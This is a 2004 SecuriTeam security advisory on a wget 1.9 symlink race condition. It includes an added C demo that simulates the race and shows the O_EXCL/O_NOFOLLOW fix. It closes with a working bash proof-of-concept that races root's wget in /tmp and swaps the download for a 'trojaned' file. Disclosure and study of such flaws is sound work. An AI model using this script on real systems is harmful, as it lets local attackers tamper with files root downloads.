[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04

    To: list@securiteam.com
    Date: 18 May 2004 19:05:50 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Wget Race Condition Vulnerability Allows a Symlink Attack
    ------------------------------------------------------------------------

    SUMMARY

    From <http://www.gnu.org/directory/wget.html>: "Wget is a network utility to
    retrieve files from the Web using http and ftp, the two most widely used
    Internet protocols. It works non-interactively, so it will work in the
    background, after having logged off. The program supports recursive
    retrieval of web-authoring pages as well as ftp sites. You can use wget to
    make mirrors of archives and home pages or to travel the Web like a WWW
    robot."

    Wget is vulnerable to a symbolic link attack while retrieving files: the
    downloaded data can end up written to a completely different location than
    the one intended.

    DETAILS

    Vulnerable Systems:
     * Wget versions 1.9, 1.9.1, possibly prior

    Wget checks whether a file with the same name as the one requested on the
    command line already exists. If it does, the download is saved under a
    different name. The problem is that wget does not lock the file between
    that check and the write, so an attacker who can write to the directory
    (a world-writable one such as /tmp, naturally) can create a symbolic link
    with that name before wget writes to it, diverting the output to any
    location the attacker chooses.

    An example of an attack sequence:
     * Wget process starts
     * File checking (but not locking!)
     * Attacker creates a symlink
     * Wget writes to the wrong place
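    The following C program is an added illustration and is not part of the
    advisory or of wget's own source. It replays the four steps above inside a
    private temporary directory, with no real wget involved: a separate
    existence check, a symlink that appears in the window after it, and then
    the open for writing. plain_create() is the check-then-open pattern the
    advisory describes; exclusive_create() is the hardened form, where
    O_CREAT|O_EXCL makes the check and the creation a single system call and
    O_NOFOLLOW refuses a symlink as the final path component. The function
    names, the "patch.bz2"/"victim" file names and the /tmp/wget-race-demo-*
    directory are assumptions made for this demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The open(2) a check-then-open program performs after its separate
 * existence check. On its own it follows whatever symlink appeared in the
 * window between the check and this call. */
int plain_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: O_EXCL makes creation fail with EEXIST if any entry
 * (a symlink included) already carries that name, and O_NOFOLLOW refuses
 * to traverse a symlink in the final component. Check and create are one
 * system call, so there is no window to race. */
int exclusive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
}

/* Read a small file back into buf; returns bytes read or -1. */
static ssize_t read_small(const char *path, char *buf, size_t cap)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Replay the advisory's sequence in a private temp directory (constructed
 * for this demo):
 *   1. the existence check finds no file called "patch.bz2"
 *   2. race window: a symlink "patch.bz2" -> "victim" appears
 *   3. the download is opened for writing
 * Returns 1 if "victim" was overwritten (symlink followed), 0 if the open
 * refused and "victim" is intact, -1 on a setup failure. */
int simulate_race(int hardened)
{
    char dir[] = "/tmp/wget-race-demo-XXXXXX";
    char victim[128], download[128], content[64];
    struct stat st;
    int vfd, fd, result = -1;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(download, sizeof download, "%s/patch.bz2", dir);

    /* A file the download name must never be allowed to reach. */
    vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (vfd < 0) goto cleanup;
    if (write(vfd, "original", 8) != 8) { close(vfd); goto cleanup; }
    close(vfd);

    /* Step 1: the check. Nothing there yet, so the name would be kept. */
    if (stat(download, &st) == 0) goto cleanup;

    /* Step 2: the window closes with a symlink sitting under that name. */
    if (symlink(victim, download) != 0) goto cleanup;

    /* Step 3: the write. */
    fd = hardened ? exclusive_create(download) : plain_create(download);
    if (fd >= 0) {
        if (write(fd, "downloaded", 10) != 10) { close(fd); goto cleanup; }
        close(fd);
    } else if (errno != EEXIST && errno != ELOOP) {
        goto cleanup;   /* some other failure, not the refusal we expect */
    }

    if (read_small(victim, content, sizeof content) < 0) goto cleanup;
    result = (strcmp(content, "downloaded") == 0) ? 1 : 0;

cleanup:
    unlink(download);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("check-then-open:   victim overwritten = %d\n", simulate_race(0));
    printf("O_EXCL|O_NOFOLLOW: victim overwritten = %d\n", simulate_race(1));
    return 0;
}
```

    Run as a plain user; the first line reports 1 (the write landed in
    "victim"), the second 0 (the open failed with EEXIST and "victim" kept
    its content). The same reasoning is why downloads into shared,
    world-writable directories should be avoided even with a fixed client:
    the atomic create only protects the final component, not the directory
    the attacker already controls.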

    Exploit:
    A proof-of-concept script is provided that can be used in the following
    manner:
     * Open a shell and execute wget_race.sh as user A
     * Open another shell and, as root, launch wget from /tmp:
            wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2
     * Check the content of /tmp/patch-2.4.26.bz2

    #!/bin/bash
    # Proof-of-concept from the advisory. salida.txt ("output") and pid.txt
    # are scratch files; a .wget marker file signals that the root wget exited.

    rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
    echo "1">salida.txt
    a=`cat salida.txt`
    echo "Waiting for Wget execution..."

    # Poll the process list until a wget fetching patch-2.4.26.bz2 appears
    while [ "$a" == 1 ]
    do
       ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
       a=`cat salida.txt`
    done

    echo "Process caught!"
    pgrep -u root wget>pid.txt
    ln -s /dev/null /tmp/patch-2.4.26.bz2
    echo "/dev/null link created!"
    echo "Waiting for downloading to finish..."

    # While wget runs this touches <pid>.wget; once pgrep returns nothing
    # the name collapses to ".wget", which the loop below uses as the signal
    b=`pgrep -u root wget`
    touch $b.wget
    c=1
    while [ "$c" == 1 ]
    do
      if [ -e .wget ]
      then
        c=0
        echo "Downloading finished! Let's delete the original file, and put our trojaned file :-)"
        rm -f /tmp/patch-2.4.26.bz2
        echo "Surprise!">/tmp/patch-2.4.26.bz2
        echo "Did it work?"
        ls -la /tmp/patch-2.4.26.bz2
      else
        b=`pgrep -u root wget`
        touch $b.wget
      fi
    done

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:overclocking_a_la_abuela@hotmail.com> Hugo "Vázquez" Caramés.
